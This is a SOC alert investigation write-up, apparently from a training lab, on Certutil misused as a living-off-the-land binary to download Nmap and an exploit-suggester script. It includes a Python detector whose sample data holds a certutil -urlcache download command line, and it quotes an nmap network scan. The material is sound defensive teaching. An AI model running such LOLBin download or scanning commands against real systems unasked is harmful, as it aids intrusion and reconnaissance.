In this alert we are tasked with investigating suspicious usage of the Certutil executable on the “EricProd” host. The event type is marked as LOLBin (Living-off-the-land binary): a legitimate, Microsoft-signed binary that an attacker or an insider repurposes for malicious ends, relying on the binary's trusted status to avoid detection.
We can use the https://github.com/LOLBAS-Project/LOLBAS repository to gain more insight into the executable in question. Looking it up, we can see that it is a Windows binary for handling certificates that can also be used to download files from the internet and save them to the host machine.
Alert
When we investigate the alert more closely in Endpoint Security by opening the details of the host, diving into the Command History (and subsequently the Process History) and zeroing in on Certutil.exe, we can see that it was used to do two things: download the setup file for the network scanner Nmap, and download the Windows Exploit Suggester Python script from a GitHub repository. Both were subsequently run on 01.03.2021 at 11:06 and 11:07 respectively, raising the alarm in Endpoint Security.
Detection
Looking through the process relationship, we can see that Certutil.exe was launched by C:/Windows/System32/cmd.exe, which in turn was launched by explorer.exe. This parent chain tells us that the activity was most likely performed interactively by the user, not by a malicious piece of software.
Analysis
As established before, Certutil.exe itself is a legitimate binary signed by Microsoft, but it is listed among the LOLBins, meaning that it can be used for purposes other than what it was designed for. This is exactly what we can see in the Endpoint Security Command History.
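As an added example (not part of the original writeup), the following Python detector encodes the two checks above over constructed process-creation events: certutil.exe invoked with a download switch and a URL, plus the parent chain that distinguishes a user-driven cmd.exe session from activity spawned by another program. The sample events, pids and the example.invalid URL are all constructed.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

# certutil switches LOLBAS lists for fetching a URL; only fire if a URL is also present
DOWNLOAD_SWITCHES = re.compile(r"[-/](urlcache|verifyctl)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def is_certutil_download(ev: ProcEvent) -> bool:
    """True when certutil.exe is run with a download switch and a URL argument."""
    if not ev.image.lower().endswith("certutil.exe"):
        return False
    return bool(DOWNLOAD_SWITCHES.search(ev.cmdline) and URL_RE.search(ev.cmdline))

def parent_chain(ev, events):
    """Follow ppid links to the root and return image base names, oldest first."""
    by_pid = {e.pid: e for e in events}
    chain, seen, cur = [], set(), ev
    while cur is not None and cur.pid not in seen:  # guard against pid-reuse loops
        seen.add(cur.pid)
        chain.append(cur.image.rsplit("\\", 1)[-1].lower())
        cur = by_pid.get(cur.ppid)
    return chain[::-1]

def find_certutil_downloads(events):
    """Return (url, parent chain) for every certutil download in the event list."""
    hits = []
    for ev in events:
        if is_certutil_download(ev):
            hits.append((URL_RE.search(ev.cmdline).group(0), parent_chain(ev, events)))
    return hits

# Constructed sample events mirroring the chain in the alert: explorer -> cmd -> certutil
SAMPLE_EVENTS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(3000, 2000, r"C:\Windows\System32\certutil.exe",
              "certutil -urlcache -split -f https://example.invalid/nmap-setup.exe nmap-setup.exe"),
    ProcEvent(3001, 2000, r"C:\Windows\System32\certutil.exe", "certutil -dump cert.cer"),  # benign
]

if __name__ == "__main__":
    for url, chain in find_certutil_downloads(SAMPLE_EVENTS):
        print(f"certutil download of {url} via {' -> '.join(chain)}")
```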
Containment
By now we have established that the host is indeed compromised (True Positive), so to proceed we need to Request Containment in Endpoint Security. We can see in the CMD History that the user ran Nmap with the command nmap -sV 192.168.0.0/24 -p 80 to scan the local network for HTTP servers, so we want to isolate the host to prevent any possible spread or lateral movement.
Lessons Learned
The key takeaway from this task is that malicious activity can also stem from legitimate, signed binaries, so it is imperative not only to confirm the legitimacy of a file but also to check how the file is actually being used. Both of these details are visible in the Command History and Process History.
Artifacts
For the IoC artifacts we should note the download and use of the two tools: the network scanner Nmap and the Windows Exploit Suggester Python script. Using their download URLs, we can configure a detection solution to look for these specific URLs in the future.